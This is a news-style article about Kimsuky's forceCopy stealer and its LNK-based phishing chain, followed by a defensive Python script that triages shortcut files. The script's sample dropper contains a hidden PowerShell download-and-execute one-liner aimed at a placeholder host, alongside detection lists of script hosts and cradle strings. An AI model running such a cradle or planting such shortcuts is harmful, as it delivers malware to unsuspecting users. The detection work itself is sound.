North Korean hackers are using a newly identified stealer, forceCopy, to take credentials saved in web browsers, according to a recent report. The Kimsuky group is behind a new wave of spear-phishing attacks that deliver it through malicious email attachments.
The attack begins with a phishing email carrying a Windows shortcut (LNK) file that is disguised, by its icon and file name, as a Microsoft Office or PDF document; because Explorer never displays the .lnk extension, a file named report.pdf.lnk appears simply as report.pdf. Double-clicking it runs the shortcut's target, typically PowerShell or mshta.exe, with a command line that downloads and executes further payloads from an attacker-controlled server.
How the Attack Works
Once the shortcut runs, the attackers deploy several tools to dig in: the PEBBLEDASH trojan, a modified build of the open-source RDP Wrapper (which enables Remote Desktop sessions on Windows editions that normally do not allow them), and proxy malware that relays their connections to infected machines that are not reachable directly from the internet. Together these give them persistent, interactive remote access to compromised systems.
They also run a PowerShell-based keylogger to record keystrokes. forceCopy, the newly identified component, takes a different route to credentials: rather than capturing logins as they are typed, it copies the files in the browser directories where saved usernames and passwords are stored, so the attackers can extract them afterwards.
Kimsuky’s Strategy and Evolution
The Kimsuky hacking group, also known as APT43, has a long history of social-engineering attacks. It previously relied mainly on custom backdoors to control infected systems, but recent reporting shows it now also uses RDP Wrapper and proxy tools to keep its access, traffic that looks far more like ordinary remote administration than a bespoke implant does.
Kimsuky has been active since at least 2012. Its operations center on getting well-crafted phishing messages past email security. In late 2024, researchers uncovered a credential-theft campaign in which the group sent its phishing emails through Russian email services.
How to Stay Protected
To avoid forceCopy infections, treat unexpected email attachments with suspicion, and in particular never open shortcut (.lnk) files that arrive by email; there is almost no legitimate reason to mail one, so gateways can block them outright, including inside archives. Verify the sender's identity before acting on a message and avoid clicking suspicious links. Keep security software updated, and enable multi-factor authentication: it limits what a stolen password is worth, though any credentials saved in a browser on a compromised machine should still be treated as exposed and rotated. Email filtering and browser security settings add further layers against phishing attempts.
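As an added example (not code from this article or from the researchers it cites), the following Python script does the static triage a mail gateway or responder would want for the LNK lure described under "How the Attack Works": it reads a shortcut's header and string fields as laid out in the public MS-SHLLINK specification, then flags the combination the article describes: a script host such as PowerShell or mshta.exe as the target, download-and-execute markers in the arguments, a hidden window, and a document icon on a non-document target. The indicator lists, the two sample shortcuts and the http://example.invalid URL are constructed for this example and are hypothetical.

```python
"""Static triage of Windows shortcut (.lnk) files: extract target/arguments
and flag script-host targets that look like download cradles.
Added example, not code from the article or any vendor report. Field layout
follows MS-SHLLINK; indicator lists and samples are constructed for this example."""
import struct
import sys

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this fixed order.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
SW_SHOWNORMAL = 1  # ShowCommand; 7 (SW_SHOWMINNOACTIVE) keeps the console out of sight

# Heuristics constructed for this example: hosts abused by LNK droppers, strings
# typical of a download-and-execute one-liner, and icon sources that mimic documents.
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript", "rundll32")
CRADLE_HINTS = ("http://", "https://", "downloadstring", "downloadfile", "invoke-webrequest",
                "iex", "-enc", "frombase64string", "-w hidden", "windowstyle hidden")
DOC_ICON_HINTS = ("winword", "excel", "powerpnt", "acrord", "shell32.dll", ".docx", ".pdf")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields of a shell link."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    hdr_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if hdr_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_cmd,) = struct.unpack_from("<I", data, 60)  # ShowCommand sits at offset 60
    off = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:       # skip LinkTargetIDList: u16 size, then the items
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:     # skip LinkInfo: u32 size that includes itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    fields = {"show_command": show_cmd}
    for bit, name in STRING_FIELDS:  # each: u16 CountCharacters, then the characters
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + width * count]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += width * count
    return fields


def triage(fields: dict) -> list:
    """Return human-readable reasons a parsed shortcut looks like a dropper ([] if none)."""
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    icon = fields.get("icon_location", "").lower()
    reasons = []
    if any(h in target for h in SCRIPT_HOSTS):
        reasons.append("target is a script host: " + fields["relative_path"])
    hits = [h for h in CRADLE_HINTS if h in args]
    if hits:
        reasons.append("download/execute markers in arguments: " + ", ".join(hits))
    if not reasons:               # plain document shortcuts get no further scrutiny
        return []
    if fields["show_command"] != SW_SHOWNORMAL:
        reasons.append("window not shown normally (ShowCommand=%d)" % fields["show_command"])
    if any(h in icon for h in DOC_ICON_HINTS):
        reasons.append("document icon on a non-document target: " + fields["icon_location"])
    return reasons


def _string_data(s: str) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "",
              show_cmd: int = SW_SHOWNORMAL) -> bytes:
    """Build a minimal Unicode shortcut (sample input only; no IDList or LinkInfo)."""
    flags, body = IS_UNICODE | HAS_REL_PATH, _string_data(relative_path)
    if arguments:
        flags, body = flags | HAS_ARGS, body + _string_data(arguments)
    if icon_location:
        flags, body = flags | HAS_ICON, body + _string_data(icon_location)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    return header + body + b"\x00\x00\x00\x00"  # TerminalBlock closes ExtraData


# Constructed samples (hypothetical values): a "PDF" that launches a hidden
# PowerShell download cradle, and an ordinary link to a Word document.
DROPPER_LNK = build_lnk(
    relative_path=r"..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-w hidden -nop -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage1')\"",
    icon_location=r"%SystemRoot%\System32\shell32.dll", show_cmd=7)
BENIGN_LNK = build_lnk(relative_path=r"..\Reports\Q3-summary.docx",
                       icon_location=r"%SystemRoot%\System32\imageres.dll")

if __name__ == "__main__":
    blobs = [open(p, "rb").read() for p in sys.argv[1:]] or [DROPPER_LNK, BENIGN_LNK]
    for blob in blobs:
        parsed = parse_lnk(blob)
        print(parsed.get("relative_path"), parsed.get("arguments", ""))
        for reason in triage(parsed) or ["no dropper indicators"]:
            print("  -", reason)
```

Run it with one or more .lnk paths, or with no arguments to triage the two built-in samples. One caveat: the script reads the target from the RELATIVE_PATH string field and deliberately skips the LinkTargetIDList; a shortcut whose target is encoded only in the IDList (no relative path, no arguments) would pass as benign here, so treat a clean result as "no indicators found", not as proof of safety.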